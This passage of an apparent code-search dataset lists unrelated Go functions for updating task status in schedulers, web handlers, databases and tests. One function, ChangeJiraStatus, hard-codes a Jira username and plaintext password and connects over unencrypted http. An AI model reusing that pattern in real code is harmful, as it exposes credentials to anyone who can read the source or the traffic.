{\n\t\t\t\tkey := toString(i + 1)\n\t\t\t\tt := m.reduceTasks[key]\n\t\t\t\tt.Files = append(t.Files, v)\n\t\t\t\tm.reduceTasks[key] = t\n\t\t\t}\n\t\t}\n\t} else if m.phase == model.Reduce {\n\t\tlog.Infof(\"reduce phase %s completed\", args.File)\n\t\ti, _ := strconv.ParseInt(args.File, 10, 32)\n\t\tkey := toString(i + 1)\n\t\tm.mutex.Lock()\n\t\tdefer m.mutex.Unlock()\n\t\tif t, ok := m.reduceTasks[key]; ok {\n\t\t\tif t.Status == inprogress {\n\t\t\t\tt.Status = completed\n\t\t\t\tm.reduceTasks[key] = t\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (t *TaskBox[T, U, C, CT, TF]) SetStatus(s int32) {\n\tt.status.Store(s)\n}", "func (context Context) UpdateTask(id string, updates map[string]interface{}) (result Task, err error) {\n\n\t// Try to find the task so that we can read its state and correctly handle state transitions.\n\tvar currentTask Task\n\tcurrentTask, err = context.GetTaskByID(id)\n\tif err != nil {\n\t\terr = errors.Wrap(err, \"error while doing resource lookup\")\n\t\treturn\n\t}\n\n\t// Build the update document. Validate values.\n\tvalueUpdates := bson.M{}\n\tfor k, v := range updates {\n\t\tswitch k {\n\t\tcase \"quality\":\n\t\t\tvalueUpdates[\"quality\"] = v.(float64)\n\t\tcase \"quality-train\":\n\t\t\tvalueUpdates[\"quality-train\"] = v.(float64)\n\t\tcase \"quality-expected\":\n\t\t\tvalueUpdates[\"quality-expected\"] = v.(float64)\n\t\tcase \"alt-qualities\":\n\t\t\tvalueUpdates[\"alt-qualities\"] = v.([]float64)\n\t\tcase \"status\":\n\t\t\tstatus := v.(string)\n\n\t\t\t// Perform state transition validations.\n\t\t\tswitch status {\n\t\t\tcase TaskScheduled:\n\t\t\t\tif currentTask.Status != TaskScheduled {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the scheduled state is not allowed\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskRunning:\n\t\t\t\tif currentTask.Status != TaskScheduled &&\n\t\t\t\t\tcurrentTask.Status != TaskPausing &&\n\t\t\t\t\tcurrentTask.Status != TaskPaused {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput,\n\t\t\t\t\t\t\"transition to the running state only allowed from the scheduled, pausing and paused state\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskPausing:\n\t\t\t\tif currentTask.Status != TaskRunning {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput,\n\t\t\t\t\t\t\"transition to the pausing state is only allowed from the running state\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskPaused:\n\t\t\t\tif currentTask.Status != TaskPausing {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput,\n\t\t\t\t\t\t\"transition to the paused state is only allowed from the pausing state\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskCompleted:\n\t\t\t\tif currentTask.Status != TaskRunning {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput,\n\t\t\t\t\t\t\"transition to the completed state is only allowed from the running state\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskTerminating:\n\t\t\t\tif currentTask.Status != TaskRunning &&\n\t\t\t\t\tcurrentTask.Status != TaskPausing &&\n\t\t\t\t\tcurrentTask.Status != TaskPaused {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput,\n\t\t\t\t\t\t\"transition to the terminating state is only allowed from the running, pausing or paused state\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskTerminated:\n\t\t\t\tif currentTask.Status != TaskTerminating {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput,\n\t\t\t\t\t\t\"transition to the terminated state is only allowed from the terminating state\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskCanceled:\n\t\t\t\tif currentTask.Status != TaskScheduled {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the scheduled state is not allowed\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskError:\n\n\t\t\t\t// Since this can be an abrupt ending, we need to record the ending time of the stage.\n\t\t\t\tswitch currentTask.Stage {\n\t\t\t\tcase TaskStageTraining:\n\t\t\t\t\tvalueUpdates[\"stage-times.training.end\"] = time.Now()\n\t\t\t\tcase TaskStagePredicting:\n\t\t\t\t\tvalueUpdates[\"stage-times.predicting.end\"] = time.Now()\n\t\t\t\tcase TaskStageEvaluating:\n\t\t\t\t\tvalueUpdates[\"stage-times.evaluating.end\"] = time.Now()\n\t\t\t\t}\n\n\t\t\tdefault:\n\t\t\t\terr = errors.Wrapf(ErrBadInput,\n\t\t\t\t\t\"value of status can be \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\" or \\\"%s\\\", but found \\\"%s\\\"\",\n\t\t\t\t\tTaskScheduled, TaskRunning, TaskCompleted, TaskTerminating, TaskTerminated, TaskPausing,\n\t\t\t\t\tTaskPaused, TaskError, status)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// If the new status has passed validation, set it.\n\t\t\tvalueUpdates[\"status\"] = status\n\n\t\tcase \"stage\":\n\t\t\tstage := v.(string)\n\n\t\t\t// Perform state transition validations.\n\t\t\tswitch stage {\n\t\t\tcase TaskStageBegin:\n\t\t\t\tif currentTask.Stage != TaskStageBegin {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the begin stage is not allowed\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tcase TaskStageTraining:\n\t\t\t\tif currentTask.Stage == TaskStageBegin {\n\t\t\t\t\tvalueUpdates[\"stage-times.training.start\"] = time.Now()\n\t\t\t\t} else if currentTask.Stage != TaskStageTraining {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the training is only allowed from the begin stage\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskStagePredicting:\n\t\t\t\tif currentTask.Stage == TaskStageTraining {\n\t\t\t\t\tvalueUpdates[\"stage-times.training.end\"] = time.Now()\n\t\t\t\t\tvalueUpdates[\"stage-times.predicting.start\"] = time.Now()\n\t\t\t\t} else if currentTask.Stage != TaskStagePredicting {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the predicting is only allowed from the training stage\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskStageEvaluating:\n\t\t\t\tif currentTask.Stage == TaskStagePredicting {\n\t\t\t\t\tvalueUpdates[\"stage-times.predicting.end\"] = time.Now()\n\t\t\t\t\tvalueUpdates[\"stage-times.evaluating.start\"] = time.Now()\n\t\t\t\t} else if currentTask.Stage != TaskStageEvaluating {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the evaluating is only allowed from the predicting stage\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\tcase TaskStageEnd:\n\t\t\t\tif currentTask.Stage == TaskStageEvaluating {\n\t\t\t\t\tvalueUpdates[\"stage-times.evaluating.end\"] = time.Now()\n\t\t\t\t} else if currentTask.Stage != TaskStageEnd {\n\t\t\t\t\terr = errors.Wrap(ErrBadInput, \"transition to the end is only allowed from the evaluating stage\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\t// If the new status has passed validation, set it.\n\t\t\tvalueUpdates[\"stage\"] = stage\n\n\t\tcase \"status-message\":\n\t\t\tvalueUpdates[\"status-message\"] = v.(string)\n\n\t\tdefault:\n\t\t\terr = errors.Wrap(ErrBadInput, \"invalid value of parameter updates\")\n\t\t\treturn\n\t\t}\n\n\t}\n\n\t// If there were no updates, then we can skip this step.\n\tif len(valueUpdates) > 0 {\n\t\tc := context.Session.DB(context.DBName).C(\"tasks\")\n\t\terr = c.Update(bson.M{\"id\": id}, bson.M{\"$set\": valueUpdates})\n\t\tif err != nil {\n\t\t\terr = errors.Wrap(err, \"mongo update failed\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// Get the updated task and update cache if needed.\n\tresult, err = context.GetTaskByID(id)\n\tif err != nil {\n\t\terr = errors.Wrap(err, \"task get by ID failed\")\n\t\treturn\n\t}\n\n\treturn\n\n}", "func (c *Client) UpdateTask(ctx context.Context, in *todopb.TaskUpdateRequest, opts ...grpc.CallOption) (*todopb.TaskResponse, error) {\n\treturn c.client.UpdateTask(ctx, in, opts...)\n}", "func (builder *Builder) SetStatus(task string, status bool) {\n\tbuilder.LinuxBuild.Status[task] = status\n}", "func (ctrl *TaskController) UpdateTask(w http.ResponseWriter, r *http.Request) {\n\ttask := &model.Task{}\n\terr := GetJSONContent(task, r)\n\tif err != nil {\n\t\tlogrus.Error(err)\n\t\tSendJSONError(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tlogrus.Println(\"update task : \", task.Id)\n\n\ttask.ModificationDate = time.Now()\n\n\ttaskExist, err := ctrl.taskDao.Exist(task.Id)\n\tif err != nil {\n\t\tlogrus.Error(err)\n\t\tSendJSONError(w, err.Error(), http.StatusNotFound)\n\t\treturn\n\t} else if taskExist == false {\n\t\tSendJSONError(w, \"task not found\", http.StatusNotFound)\n\t\treturn\n\t}\n\n\ttask, err = ctrl.taskDao.Upsert(task)\n\tif err != nil {\n\t\tlogrus.Error(err)\n\t\tSendJSONError(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tlogrus.Println(\"task : \", task)\n\tSendJSONOk(w, task)\n}", "func NewTaskStatusUpdate(\n\td *yarpc.Dispatcher,\n\tjobStore storage.JobStore,\n\ttaskStore storage.TaskStore,\n\tvolumeStore storage.PersistentVolumeStore,\n\tjobFactory cached.JobFactory,\n\tgoalStateDriver goalstate.Driver,\n\tlisteners []Listener,\n\tparentScope tally.Scope,\n\thmVersion api.Version,\n) StatusUpdate {\n\n\tstatusUpdater := &statusUpdate{\n\t\tjobStore: jobStore,\n\t\ttaskStore: taskStore,\n\t\tvolumeStore: volumeStore,\n\t\trootCtx: context.Background(),\n\t\tmetrics: NewMetrics(parentScope.SubScope(\"status_updater\")),\n\t\teventClients: make(map[string]StatusUpdate),\n\t\tjobFactory: jobFactory,\n\t\tgoalStateDriver: goalStateDriver,\n\t\tlisteners: listeners,\n\t\tlm: lifecyclemgr.New(hmVersion, d, parentScope),\n\t}\n\t// TODO: add config for BucketEventProcessor\n\tstatusUpdater.applier = newBucketEventProcessor(statusUpdater, 100, 10000)\n\n\tif hmVersion.IsV1() {\n\t\tv1eventClient := v1eventstream.NewEventStreamClient(\n\t\t\td,\n\t\t\tcommon.PelotonJobManager,\n\t\t\tcommon.PelotonHostManager,\n\t\t\tstatusUpdater,\n\t\t\tparentScope.SubScope(\"HostmgrV1EventStreamClient\"))\n\t\tstatusUpdater.eventClients[common.PelotonV1HostManager] = v1eventClient\n\t} else {\n\t\teventClient := eventstream.NewEventStreamClient(\n\t\t\td,\n\t\t\tcommon.PelotonJobManager,\n\t\t\tcommon.PelotonHostManager,\n\t\t\tstatusUpdater,\n\t\t\tparentScope.SubScope(\"HostmgrEventStreamClient\"))\n\t\tstatusUpdater.eventClients[common.PelotonHostManager] = eventClient\n\t}\n\n\teventClientRM := eventstream.NewEventStreamClient(\n\t\td,\n\t\tcommon.PelotonJobManager,\n\t\tcommon.PelotonResourceManager,\n\t\tstatusUpdater,\n\t\tparentScope.SubScope(\"ResmgrEventStreamClient\"))\n\tstatusUpdater.eventClients[common.PelotonResourceManager] = eventClientRM\n\treturn statusUpdater\n}", "func updateWebappTaskSetFailed(task Task) error {\n\tupdateVars := task.GetUpdateTaskVars()\n\tupdateVars.GetUpdateTaskCommonVars().Id = task.GetCommonCols().Id\n\tupdateVars.GetUpdateTaskCommonVars().SetCompleted(false)\n\treturn frontend.UpdateWebappTaskV2(updateVars)\n}", "func (o *OpenapiTaskGenerationResult) SetTaskStatus(v string) {\n\to.TaskStatus = &v\n}", "func (p *AuroraAdminClient) ForceTaskState(ctx context.Context, taskId string, status ScheduleStatus) (r *Response, err error) {\n var _args319 AuroraAdminForceTaskStateArgs\n _args319.TaskId = taskId\n _args319.Status = status\n var _result320 AuroraAdminForceTaskStateResult\n if err = p.Client_().Call(ctx, \"forceTaskState\", &_args319, &_result320); err != nil {\n return\n }\n return _result320.GetSuccess(), nil\n}", "func (t *TaskService) UpdateTask(path string, newTaskDef Definition) (*RegisteredTask, error) {\n\treturn t.UpdateTaskEx(path, newTaskDef, \"\", \"\", newTaskDef.Principal.LogonType)\n}", "func (e *Executor) Status(ctx context.Context, calls ...taskfile.Call) error {\n\tfor _, call := range calls {\n\n\t\t// Compile the task\n\t\tt, err := e.CompiledTask(call)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Get the fingerprinting method to use\n\t\tmethod := e.Taskfile.Method\n\t\tif t.Method != \"\" {\n\t\t\tmethod = t.Method\n\t\t}\n\n\t\t// Check if the task is up-to-date\n\t\tisUpToDate, err := fingerprint.IsTaskUpToDate(ctx, t,\n\t\t\tfingerprint.WithMethod(method),\n\t\t\tfingerprint.WithTempDir(e.TempDir),\n\t\t\tfingerprint.WithDry(e.Dry),\n\t\t\tfingerprint.WithLogger(e.Logger),\n\t\t)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !isUpToDate {\n\t\t\treturn fmt.Errorf(`task: Task \"%s\" is not up-to-date`, t.Name())\n\t\t}\n\t}\n\treturn nil\n}", "func (a *Client) UpdateTask(params *UpdateTaskParams, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*UpdateTaskOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewUpdateTaskParams()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"updateTask\",\n\t\tMethod: \"PUT\",\n\t\tPathPattern: \"/tasks/{id}\",\n\t\tProducesMediaTypes: []string{\"application/vnd.goswagger.examples.task-tracker.v1+json\"},\n\t\tConsumesMediaTypes: []string{\"application/vnd.goswagger.examples.task-tracker.v1+json\"},\n\t\tSchemes: []string{\"http\", \"https\"},\n\t\tParams: params,\n\t\tReader: &UpdateTaskReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*UpdateTaskOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*UpdateTaskDefault)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (p *AuroraAdminClient) ForceTaskState(ctx context.Context, taskId string, status ScheduleStatus) (r *Response, err error) {\n var _args369 AuroraAdminForceTaskStateArgs\n _args369.TaskId = taskId\n _args369.Status = status\n var _result370 AuroraAdminForceTaskStateResult\n var meta thrift.ResponseMeta\n meta, err = p.Client_().Call(ctx, \"forceTaskState\", &_args369, &_result370)\n p.SetLastResponseMeta_(meta)\n if err != nil {\n return\n }\n return _result370.GetSuccess(), nil\n}", "func UpdateJobTask(w http.ResponseWriter, r *http.Request) {\n\tresponse := services.UpdateJobTask(r)\n\n\trender.Status(r, response.Code)\n\trender.JSON(w, r, response)\n}", "func UpdateTask(w http.ResponseWriter, r *http.Request, repo *tasks.TaskRepository) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tdecoder := json.NewDecoder(r.Body)\n\tparams := mux.Vars(r)\n\ttaskID, err := strconv.Atoi(params[\"id\"])\n\tvar updateParams map[string]string\n\terr = decoder.Decode(&updateParams)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\ttask, err := repo.UpdateTask(taskID, updateParams)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tjson.NewEncoder(w).Encode(apiIndexTask(task))\n}", "func (f *FileStorageTodoRepository) UpdateTask(todoID uuid.UUID, taskID uuid.UUID, completed bool) error {\n\tvalue, _ := f.disk.Read(todoID.String())\n\tvar (\n\t\ttodo models.Todo\n\t\terr error\n\t)\n\n\tdec := gob.NewDecoder(bytes.NewReader(value))\n\n\terr = dec.Decode(&todo)\n\tif err != nil {\n\t\terr = errors.WithStack(err)\n\t\treturn err\n\t}\n\tfor i := 0; i < len(todo.Tasks); i++ {\n\t\tif todo.Tasks[i].ID == taskID {\n\t\t\ttodo.Tasks[i].Completed = completed\n\t\t\tbreak\n\t\t}\n\t}\n\tvar buffer bytes.Buffer\n\tenc := gob.NewEncoder(&buffer)\n\terr = enc.Encode(todo)\n\tif err != nil {\n\t\terr = errors.WithStack(err)\n\t\treturn err\n\t}\n\n\terr = f.disk.Write(todo.ID.String(), buffer.Bytes())\n\tif err != nil {\n\t\terr = errors.WithStack(err)\n\t}\n\treturn err\n}", "func (m *MockDB) UpdateTaskStatus(taskID uint, status string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"UpdateTaskStatus\", taskID, status)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (ghidraScriptTask *GhidraScriptTask) SetStatus(queueStatus *GhidraTaskStatus) {\n\tghidraScriptTask.status = *queueStatus\n}", "func (driver *MesosExecutorDriver) SendStatusUpdate(taskStatus *mesosproto.TaskStatus) (mesosproto.Status, error) {\n\tlog.Infoln(\"Sending status update\")\n\n\tdriver.mutex.Lock()\n\tdefer driver.mutex.Unlock()\n\n\tif taskStatus.GetState() == mesosproto.TaskState_TASK_STAGING {\n\t\tlog.Errorf(\"Executor is not allowed to send TASK_STAGING status update. Aborting!\\n\")\n\t\tdriver.Abort()\n\t\terr := fmt.Errorf(\"Attempted to send TASK_STAGING status update\")\n\t\tdriver.Executor.Error(driver, err.Error())\n\t\treturn driver.status, err\n\t}\n\n\t// Set up status update.\n\tupdate := driver.makeStatusUpdate(taskStatus)\n\tlog.Infof(\"Executor sending status update %v\\n\", update.String())\n\n\t// Capture the status update.\n\tdriver.updates[uuid.UUID(update.GetUuid()).String()] = update\n\n\t// Put the status update in the message.\n\tmessage := &mesosproto.StatusUpdateMessage{\n\t\tUpdate: update,\n\t\tPid: proto.String(driver.self.String()),\n\t}\n\t// Send the message.\n\tif err := driver.messenger.Send(driver.slaveUPID, message); err != nil {\n\t\tlog.Errorf(\"Failed to send %v: %v\\n\")\n\t\treturn driver.status, err\n\t}\n\treturn driver.status, nil\n}", "func UpdateTask(w http.ResponseWriter, r *http.Request) {\n\tparams := mux.Vars(r)\n\n\tif params[\"id\"] == \"\" {\n\t\thttp.Error(w, http.StatusText(400), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tvar task models.Task\n\terr := json.NewDecoder(r.Body).Decode(&task)\n\n\tif err != nil {\n\t\thttp.Error(w, http.StatusText(400), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\ttask.ID = bson.ObjectIdHex(params[\"id\"])\n\n\tupdatedTask, err := repository.UpdateTask(task)\n\n\tif err != nil {\n\t\thttp.Error(w, http.StatusText(500), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\n\tjson.NewEncoder(w).Encode(updatedTask)\n}", "func (o moveTaskOrderUpdater) UpdateStatusServiceCounselingCompleted(appCtx appcontext.AppContext, moveTaskOrderID uuid.UUID, eTag string) (*models.Move, error) {\n\t// Fetch the move and associations.\n\tsearchParams := services.MoveTaskOrderFetcherParams{\n\t\tIncludeHidden: false,\n\t\tMoveTaskOrderID: moveTaskOrderID,\n\t}\n\tmove, fetchErr := o.FetchMoveTaskOrder(appCtx, &searchParams)\n\tif fetchErr != nil {\n\t\treturn &models.Move{}, fetchErr\n\t}\n\n\t// Check the If-Match header against existing eTag before updating.\n\tencodedUpdatedAt := etag.GenerateEtag(move.UpdatedAt)\n\tif encodedUpdatedAt != eTag {\n\t\treturn &models.Move{}, apperror.NewPreconditionFailedError(move.ID, nil)\n\t}\n\n\ttransactionError := appCtx.NewTransaction(func(txnAppCtx appcontext.AppContext) error {\n\t\t// Update move status, verifying that move/shipments are in expected state.\n\t\terr := o.moveRouter.CompleteServiceCounseling(appCtx, move)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Save the move.\n\t\tvar verrs *validate.Errors\n\t\tverrs, err = appCtx.DB().ValidateAndSave(move)\n\t\tif verrs != nil && verrs.HasAny() {\n\t\t\treturn apperror.NewInvalidInputError(move.ID, nil, verrs, \"\")\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// If this is a PPM-only move, then we also need to adjust other statuses:\n\t\t// - set MTO shipment status to APPROVED\n\t\t// - set PPM shipment status to WAITING_ON_CUSTOMER\n\t\t// TODO: Perhaps this could be part of the shipment router. PPMs are a separate model/table,\n\t\t// so would need to figure out how they factor in.\n\t\tif move.IsPPMOnly() {\n\t\t\t// Note: Avoiding the copy of the element in the range so we can preserve the changes to the\n\t\t\t// statuses when we return the entire move tree.\n\t\t\tfor i := range move.MTOShipments { // We should only have PPM shipments if we get to here.\n\t\t\t\tmove.MTOShipments[i].Status = models.MTOShipmentStatusApproved\n\n\t\t\t\tverrs, err = appCtx.DB().ValidateAndSave(&move.MTOShipments[i])\n\t\t\t\tif verrs != nil && verrs.HasAny() {\n\t\t\t\t\treturn apperror.NewInvalidInputError(move.MTOShipments[i].ID, nil, verrs, \"\")\n\t\t\t\t}\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tif move.MTOShipments[i].PPMShipment != nil {\n\t\t\t\t\tmove.MTOShipments[i].PPMShipment.Status = models.PPMShipmentStatusWaitingOnCustomer\n\t\t\t\t\tnow := time.Now()\n\t\t\t\t\tmove.MTOShipments[i].PPMShipment.ApprovedAt = &now\n\n\t\t\t\t\tverrs, err = appCtx.DB().ValidateAndSave(move.MTOShipments[i].PPMShipment)\n\t\t\t\t\tif verrs != nil && verrs.HasAny() {\n\t\t\t\t\t\treturn apperror.NewInvalidInputError(move.MTOShipments[i].PPMShipment.ID, nil, verrs, \"\")\n\t\t\t\t\t}\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t})\n\n\tif transactionError != nil {\n\t\treturn &models.Move{}, transactionError\n\t}\n\n\treturn move, nil\n}", "func UpdateProgress(ctx context.Context, n, outof uint64) {\n\tt := GetTask(ctx)\n\tif t == nil {\n\t\tpanic(\"status.UpdateProgress called with no corresponding status.Start\")\n\t}\n\tt.completion = float32(n) / float32(outof)\n\tonTaskProgress(ctx, t)\n}", "func (ts TaskService) CheckTask(req *CheckTaskRequest, stream TaskService_CheckTaskServer) error {\n\tif err := ts.Manager.CheckClientAuth(req.Session); err != nil {\n\t\treturn errors.Wrap(err, \"failed to CheckClientAuth\")\n\t}\n\n\ttask, err := ts.Manager.GetTask(req.UUID)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to GetTask\")\n\t}\n\n\tstatus := \"\"\n\n\tlistener := ts.Manager.GetTaskUpdateListener(req.UUID)\n\n\tfor {\n\t\t// only send the update if the status has changed\n\t\tif task.Status != status {\n\t\t\tstatus = task.Status\n\n\t\t\tresp := &CheckTaskResponse{\n\t\t\t\tStatus: task.Status,\n\t\t\t\tEncTaskKey: task.GetEncTaskKey(task.Meta.ClientKeyKID),\n\t\t\t\tResult: task.EncResult,\n\t\t\t}\n\n\t\t\tif err := stream.Send(resp); err != nil {\n\t\t\t\tlog.LogError(errors.Wrap(err, \"failed to Send\"))\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\tif task.IsFinished() {\n\t\t\tbreak\n\t\t}\n\n\t\tupdatedTask := <-listener\n\t\ttask = &updatedTask\n\t}\n\n\treturn nil\n}", "func (r *versionResolver) BaseTaskStatuses(ctx context.Context, obj *restModel.APIVersion) ([]string, error) {\n\tbaseVersion, err := model.FindBaseVersionForVersion(*obj.Id)\n\tif err != nil {\n\t\treturn nil, InternalServerError.Send(ctx, fmt.Sprintf(\"Error finding base version for version '%s': %s\", *obj.Id, err.Error()))\n\t}\n\tif baseVersion == nil {\n\t\treturn nil, nil\n\t}\n\tstatuses, err := task.GetBaseStatusesForActivatedTasks(ctx, *obj.Id, baseVersion.Id)\n\tif err != nil {\n\t\treturn nil, InternalServerError.Send(ctx, fmt.Sprintf(\"Error getting base statuses for version '%s': %s\", *obj.Id, err.Error()))\n\t}\n\treturn statuses, nil\n}", "func updateTask(w http.ResponseWriter, r *http.Request){\n\t//definimos variable de vars que devuelve las variables de ruta\n\tvars := mux.Vars(r)\n\t//convertimos la variable del id a ints\n\ttaskID, err := strconv.Atoi(vars[\"id\"])\n\n\t//Creamos una variable donde almacenaremos la nueva tarea \n\tvar updatedTask task\n\n\n\tif err != nil {\n\t\tfmt.Fprintf(w, \"Invalid ID\")\n\t}\n\n\t//Creamos una funcion que lee todo el body del request\n\treqBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tfmt.Fprintf(w,\"Please enter Valid Data\")\n\t}\n\n\t//Desarma el Json y lo hace una struct\n\tjson.Unmarshal(reqBody, &updatedTask)\n\n\t\n\t//Se busca entre todas las tasks una task con el ID solicitado\n\tfor i, task := range tasks {\n\t\tif task.ID == taskID {\n\t\t\t//Se elimina la task a la lista, guardando todas las que estan hasta su indice, y la que le sigue en adelante.\n\t\t\ttasks = append(tasks[:i], tasks[i + 1:]...)\n\n\t\t\t//El id se mantiene\n\t\t\tupdatedTask.ID = taskID\n\t\t\t//Se agrega nueva task\n\t\t\ttasks = append(tasks, updatedTask)\n\n\t\t\t//Aviso de que la task se cambio con exito\n\t\t\tfmt.Fprintf(w, \"The task with ID %v has been succesfully updated\", taskID)\n\t\t}\n\t}\n}", "func ChangeJiraStatus(ticket *Task) {\n\n\tjiraURL := \"http://jira.verf.io:8080\"\n\tjiraUsername := \"brian\"\n\tjiraPassword := \"P@ssw0rd\"\n\n\ttp := jira.BasicAuthTransport{\n\t\tUsername: strings.TrimSpace(jiraUsername),\n\t\tPassword: strings.TrimSpace(jiraPassword),\n\t}\n\n\tclient, err := jira.NewClient(tp.Client(), strings.TrimSpace(jiraURL))\n\tif err != nil {\n\t\tfmt.Printf(\"\\nerror with Jira connection: %v\\n\", err)\n\t\treturn\n\t}\n\n\tclientIssue := client.Issue\n\n\tissue, _, err := clientIssue.Get(ticket.SourceID, nil)\n\tfmt.Println(\"Update status in Jira to \\\"DONE\\\" for Issue:\", issue.ID)\n\t// 11 - from TO DO to IN PROGRESS\n\t// 21 - from TO DO to DONE\n\n\t// 31 - from IN PROGRESS to TO DO\n\t// 41 - from IN PROGRESS to DONE\n\n\t// 51 - from DONE to TO DO\n\t// 61 - from DONE to IN PROGRESS\n\t//update status to \"DONE\"\n\t_, err = clientIssue.DoTransition(issue.ID, \"21\")\n\tif err != nil {\n\t\tfmt.Printf(\"\\nerror: %v\\n\", err)\n\t\treturn\n\t}\n\n\tchangeStatus(ticket, \"Closed\")\n\tissue, _, err = clientIssue.Get(ticket.SourceID, nil)\n\tfmt.Println(\"Status of Issue\", issue.ID, \"was successfully updated to:\", issue.Fields.Status.Name)\n}", "func testUpdateTaskWithRetriesSuccess(t sktest.TestingT, db TaskDB) {\n\tctx := context.Background()\n\tbegin := time.Now()\n\n\t// Create new task t1.\n\tt1 := types.MakeTestTask(begin.Add(TS_RESOLUTION), []string{\"a\", \"b\", \"c\", \"d\"})\n\trequire.NoError(t, db.PutTask(ctx, t1))\n\n\t// Attempt update.\n\tcallCount := 0\n\tt1Updated, err := UpdateTaskWithRetries(ctx, db, t1.Id, func(task *types.Task) error {\n\t\tcallCount++\n\t\tif callCount < 3 {\n\t\t\t// Sneakily make an update in the background.\n\t\t\tt1.Commits = append(t1.Commits, fmt.Sprintf(\"z%d\", callCount))\n\t\t\trequire.NoError(t, db.PutTask(ctx, t1))\n\t\t}\n\t\ttask.Status = types.TASK_STATUS_SUCCESS\n\t\treturn nil\n\t})\n\trequire.NoError(t, err)\n\trequire.Equal(t, 3, callCount)\n\trequire.Equal(t, t1.Id, t1Updated.Id)\n\trequire.Equal(t, types.TASK_STATUS_SUCCESS, t1Updated.Status)\n\n\t// Check that return value matches what's in the DB.\n\tt1Again, err := db.GetTaskById(ctx, t1.Id)\n\trequire.NoError(t, err)\n\tAssertDeepEqual(t, t1Again, t1Updated)\n\n\t// Check no extra tasks in the DB.\n\ttasks, err := db.GetTasksFromDateRange(ctx, begin, time.Now().Add(2*TS_RESOLUTION), \"\")\n\trequire.NoError(t, err)\n\trequire.Equal(t, 1, len(tasks))\n\trequire.Equal(t, t1.Id, tasks[0].Id)\n}", "func isDuplicateStateUpdate(\n\ttaskInfo *pb_task.TaskInfo,\n\tupdateEvent *statusupdate.Event,\n) bool {\n\tif updateEvent.State() != taskInfo.GetRuntime().GetState() {\n\t\treturn false\n\t}\n\n\tmesosTaskStatus := updateEvent.MesosTaskStatus()\n\tpodEvent := updateEvent.PodEvent()\n\n\tif updateEvent.State() != pb_task.TaskState_RUNNING {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": mesosTaskStatus,\n\t\t\t\"pod_event\": podEvent,\n\t\t}).Debug(\"skip same status update if state is not RUNNING\")\n\t\treturn true\n\t}\n\n\tif taskInfo.GetConfig().GetHealthCheck() == nil 